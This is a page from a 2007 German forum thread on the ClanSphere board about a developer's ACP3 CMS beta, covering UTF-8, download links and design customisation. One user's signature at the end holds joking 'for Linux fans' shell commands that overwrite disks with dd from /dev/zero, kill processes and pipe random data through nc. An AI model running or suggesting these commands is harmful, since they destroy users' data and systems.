Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 29
Seite < 1 [2]
Vyper
Thread-Ersteller


Rock the board




Beiträge: 71
# Antwort: 21 - 10.08.2007 um 12:33 Uhr
@DubZ: Google kann sehr wohl mit UTF-8 umgehen. Kannst ja mal z.B. bei eben genannter Suchmaschine "Stromer Solar Über uns" eingeben; diese Seite setzt ebenfalls voll auf UTF-8.
Außerdem ist UTF-8 nunmal die Zukunft. Damit hat man halt einfach nicht mehr diese Probleme, dass bestimmte Zeichen in einem Zeichensatz nicht verfügbar sind, wenn man z.B. (auch wenns in diesem Moment hirnrissig ist) aribische im ISO-8859-1 verwenden möchte, diese Probleme hat man halt mit UTF-8 nicht.

@reVerB: Über zusätzliche Module hab ich mir bis jetzt nicht allzu viele Gedanken gemacht.
Fest steht allerdings schon, dass es zumindest ein Forum geben wird. Ob ich das nun dann gleich mit ins Archiv aufnehme oder als extra Download anbiete, dass weiß ich bis jetzt noch nicht.


------------------


Inaktiv
|
TeQu!La ClanSphere Team


Specialist




Herkunft: Grevenbroich
Beiträge: 2142
# Antwort: 22 - 10.08.2007 um 15:44 Uhr
gibbet nu ne demo? oder hats jemand installiert das ich es mir mal angucken kann ^^


------------------

ClanSphere - professional clan care starts here


Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 23 - 10.08.2007 um 15:56 Uhr
http://www.goratsch-webdesign.de/demo/


------------------
www.laszlokorte.de

Inaktiv
|
Vyper
Thread-Ersteller


Rock the board




Beiträge: 71
# Antwort: 24 - 11.08.2007 um 17:12 Uhr
So, hab mal das Archiv auf die Version Beta 7 aktualisiert.
Die Installation sollte ab jetzt vollkommen reibungslos ablaufen und hab noch einige weitere nervige Bugs gefixt.
Komplettes Paket: http://www.goratsch-webdesign.de/dl/details/id_2/
Nur die geänderten Dateien seit Beta 6: http://www.goratsch-webdesign.de/dl/details/id_3/


------------------


Inaktiv
|
Pixelpacker


Wannabe poster




Beiträge: 33
# Antwort: 25 - 11.08.2007 um 18:41 Uhr
Soweit so gut. Ich bin an dem Ganzen interessiert! Dein System wäre ideal für mein nächstes Vorhaben. Es wird sich dabei um eine Feuerwehrseite handeln. Ich hab mir die Demo angeshen und auch gleich mal nachgesehen wie das mit dem Design so geht. Ehrlich gesagt bin ich überfordert. Wie functioniert die Anpassung?


Inaktiv
|
Vyper
Thread-Ersteller


Rock the board




Beiträge: 71
# Antwort: 26 - 11.08.2007 um 19:44 Uhr
Im Grunde genommen ist das recht einfach.
Es gibt da einen Ordner names "designs", dort befindet sich wiederum ein Ordner namens "acp3".
Den kannst du erstmal kopieren und gleich wieder einfügen und anschließend umbennen.
Dann gehst du in den Ordner und öffnest erstmal die info.php und änderst dort bei "name" den Namen des Designs ab.
Das Grunddesign befindet sich in der layout.html und das Stylesheet ist die style.css, in den beiden Dateien kannst du designmäßig schon ziemlich viel verändern.
Alles was in geschweiften Klammern steht, sind die Template Platzhalter, welche dann halt durch Inhalt ersetzt werden.
Falls du weitere Veränderungen in Moduldateien vornehmen musst, angenommen du willst die News Auflistung verändern, so gehst du einfach über designs -> dein_design -> news -> list.html und änderst halt alles nach belieben ab.

Abschließend loggst du dich ein -> System -> Sprache & Design -> Dort dein neues Design auswählen.


------------------


Zuletzt editiert von Vyper am 11.08.2007 um 19:45 Uhr (1x Editiert)
Inaktiv
|
hajo ClanSphere Team


VIP - Poster




Herkunft: Barsbüttel
Beiträge: 9411
# Antwort: 27 - 11.08.2007 um 23:25 Uhr
Wäre euch dankbar wenn ihr spezifisches zum Thema auf der ACP-Seite bzw. direkt klären könntet. Bitte nicht angegriffen fühlen, nur ein dezenter Hinweis da es hier "normalerweise" um ein anderes CMS geht auf dieser Homepage


------------------
ClanSphere - professional clan care starts here

Inaktiv
|
Vyper
Thread-Ersteller


Rock the board




Beiträge: 71
# Antwort: 28 - 12.08.2007 um 11:40 Uhr
Okay, hab mal einen Thread im ACP3 Forum erstellt.
Wer Lust und Laune hat, kann sich dort ja anmelden, ich werde dann dort man Rat und Tat zur Seite stehen.
http://www.goratsch-webdesign.de/board/viewtopic.php?f=2&t=2


------------------


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 29 - 12.08.2007 um 23:04 Uhr
./closed


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 29
Seite < 1 [2]


Sie müssen sich registrieren, um zu antworten.